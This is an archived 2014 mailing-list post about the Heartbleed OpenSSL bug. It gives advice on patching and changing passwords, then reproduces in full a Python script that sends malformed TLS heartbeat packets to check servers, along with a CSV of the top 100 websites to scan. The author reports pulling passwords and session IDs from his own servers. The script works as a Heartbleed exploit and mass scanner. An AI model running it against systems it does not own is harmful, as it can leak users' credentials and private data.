× The internal search function is temporarily non-functional. The current search engine is no longer viable and we are researching alternatives.
As a stop gap measure, we are using Google's custom search engine service.
If you know of an easy to use, open source, search engine ... please contact support@midrange.com.



On 4/9/2014 10:10 AM, Steinmetz, Paul wrote:
The vulnerability is being referred to as the Heartbleed Bug. It allows an attacker to leak memory of transactions and possibly decrypt the encrypted data. Reports indicate that the vulnerability is found version V1.0.1 and subsequent subversions (a) through (f).

I posted about this yesterday.

There are two ways to look at this:
1) You are the client
2) You are the server

As a client, I've been using a Python script and a csv file to actually
test the web sites I want to go to before I go there. This is only
partially useful, since the bug has been in the wild for years and
anyone could have been sniffing server memory for all that time.

I have also used that Python script to hit all of my servers to see if
they are vulnerable.

This is not theoretical. I was able to get user profiles, cookies,
passwords, session IDs and more from servers we own. All in plaintext.

If your servers are vulnerable:
1) Patch OpenSSL
2) Get new SSL certificates
3) Change all passwords

If you are a client, (and this includes IBM i as a client to SSL-enabled
servers) test the server you are connecting to for vulnerability. Once
it is patched, change the passwords. It is useless to change the
password until the server is patched because someone will be able to
sniff the newly changed password.

heartbleed.py

#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford
(jspenguin@xxxxxxxxxxxxx)
# The author disclaims copyright to this source code.

# Quickly and dirtily modified by Mustafa Al-Bassam (mus@xxxxxxxxxxxx)
to test
# the Alexa top X.

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

options = OptionParser(usage='%prog file max', description='Test for SSL
heartbeat vulnerability (CVE-2014-0160) on multiple domains, takes in
Alexa top X CSV file')

def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')

hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

hb = h2bin('''
18 03 02 00 03
01 40 00
''')

def hexdump(s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
#print ' %04x: %-48s %s' % (b, hxdat, pdat)
#print

def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
try:
data = s.recv(remain)
except Exception, e:
return None
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata


def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
#print 'Unexpected EOF receiving record header - server closed
connection'
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
#print 'Unexpected EOF receiving record payload - server closed
connection'
return None, None, None
#print ' ... received message: type = %d, ver = %04x, length = %d' %
(typ, ver, len(pay))
return typ, ver, pay

def hit_hb(s):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
#print 'No heartbeat response received, server likely not
vulnerable'
return False

if typ == 24:
#print 'Received heartbeat response:'
hexdump(pay)
if len(pay) > 3:
#print 'WARNING: server returned more data than it
should - server is vulnerable!'
return True
else:
#print 'Server processed malformed heartbeat, but did
not return any extra data.'
return False

if typ == 21:
#print 'Received alert:'
hexdump(pay)
#print 'Server returned error, likely not vulnerable'
return False

def is_vulnerable(domain):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
#print 'Connecting...'
#sys.stdout.flush()
try:
s.connect((domain, 443))
except Exception, e:
return None
#print 'Sending Client Hello...'
#sys.stdout.flush()
s.send(hello)
#print 'Waiting for Server Hello...'
#sys.stdout.flush()
while True:
typ, ver, pay = recvmsg(s)
if typ == None:
#print 'Server closed connection without sending Server Hello.'
return None
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break

#print 'Sending heartbeat request...'
#sys.stdout.flush()
s.send(hb)
return hit_hb(s)

def main():
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return

counter_nossl = 0;
counter_notvuln = 0;
counter_vuln = 0;

f = open(args[0], 'r')
for line in f:
rank, domain = line.split(',')
domain = domain.strip()
print "Testing " + domain + "... ",
sys.stdout.flush();
result = is_vulnerable(domain);
if result is None:
print "no SSL."
counter_nossl += 1;
elif result:
print "vulnerable."
counter_vuln += 1;
else:
print "not vulnerable."
counter_notvuln += 1;

if int(rank) >= int(args[1]):
break

print
print "No SSL: " + str(counter_nossl)
print "Vulnerable: " + str(counter_vuln)
print "Not vulnerable: " + str(counter_notvuln)

if __name__ == '__main__':
main()

The csv file is a simple .csv file that has a number in the first column
and a web site in the second. Here are the top 100 web sites:

1,google.com,
2,facebook.com,
3,youtube.com,
4,yahoo.com,
5,baidu.com,
6,wikipedia.org,
7,qq.com,
8,twitter.com,
9,live.com,
10,linkedin.com,
11,taobao.com,
12,amazon.com,
13,google.co.in,
14,sina.com.cn,
15,blogspot.com,
16,hao123.com,
17,weibo.com,
18,wordpress.com,
19,yahoo.co.jp,
20,vk.com,
21,yandex.ru,
22,ebay.com,
23,bing.com,
24,google.de,
25,tmall.com,
26,pinterest.com,
27,sohu.com,
28,google.co.uk,
29,ask.com,
30,360.cn,
31,google.fr,
32,google.co.jp,
33,msn.com,
34,instagram.com,
35,tumblr.com,
36,163.com,
37,google.com.br,
38,mail.ru,
39,microsoft.com,
40,paypal.com,
41,soso.com,
42,adcash.com,
43,google.ru,
44,xvideos.com,
45,google.es,
46,google.it,
47,imdb.com,
48,apple.com,
49,imgur.com,
50,cnn.com,
51,neobux.com,
52,craigslist.org,
53,amazon.co.jp,
54,google.com.hk,
55,stackoverflow.com,
56,xhamster.com,
57,google.com.mx,
58,reddit.com,
59,gmw.cn,
60,ifeng.com,
61,vube.com,
62,go.com,
63,bbc.co.uk,
64,google.ca,
65,blogger.com,
66,fc2.com,
67,xinhuanet.com,
68,aliexpress.com,
69,odnoklassniki.ru,
70,alipay.com,
71,akamaihd.net,
72,alibaba.com,
73,googleusercontent.com,
74,wordpress.org,
75,godaddy.com,
76,google.com.tr,
77,t.co,
78,huffingtonpost.com,
79,pornhub.com,
80,google.com.au,
81,about.com,
82,people.com.cn,
83,amazon.de,
84,kickass.to,
85,youku.com,
86,ebay.de,
87,thepiratebay.se,
88,espn.go.com,
89,google.pl,
90,blogspot.in,
91,clkmon.com,
92,dailymotion.com,
93,flickr.com,
94,bp.blogspot.com,
95,netflix.com,
96,conduit.com,
97,dailymail.co.uk,
98,china.com,
99,adobe.com,
100,vimeo.com,


--buck

As an Amazon Associate we earn from qualifying purchases.

This thread ...


Follow On AppleNews
Return to Archive home page | Return to MIDRANGE.COM home page

This mailing list archive is Copyright 1997-2024 by midrange.com and David Gibbs as a compilation work. Use of the archive is restricted to research of a business or technical nature. Any other uses are prohibited. Full details are available on our policy page. If you have questions about this, please contact [javascript protected email address].

Operating expenses for this site are earned using the Amazon Associate program and Google Adsense.